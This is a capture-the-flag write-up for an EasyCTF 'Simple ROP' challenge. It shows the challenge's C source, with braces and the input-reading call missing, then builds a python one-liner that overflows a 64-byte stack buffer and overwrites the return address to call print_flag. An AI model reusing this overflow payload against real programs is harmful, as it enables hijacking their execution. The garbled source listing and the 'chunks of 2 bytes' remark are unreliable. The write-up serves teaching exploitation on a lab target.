# Simple ROP - 120 Points

Read flag.txt



### Solution

###### Writeup by VoidMercy from phsst

We were given a binary and it's source code.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

void print_flag();
void what_did_you_say();

int main(int argc, char* argv[])
gid_t gid = getegid();
setresgid(gid, gid, gid);
return 0;

void print_flag()
system("cat flag.txt");

void what_did_you_say()
char buff[64];
printf("You said: %s\n", buff);

As the problem name suggests, this is a problem that uses ROP. We can see that we have to call the function print_flag() to get the flag, so we first get the address of this function with:

>objdump -d simplerop | grep "print_flag"

We find the address of print_flag to be: 0x804851a

Then, we have to find out the number of characters until we gain control of eip through the return address. Afterwards we append the address of print_flag() in little endian order (reversed order in chunks of 2 bytes), then pipe the input through python (to print the non printable ascii characters).

python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS

python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS

## Flag


Original writeup (https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Simple%20ROP).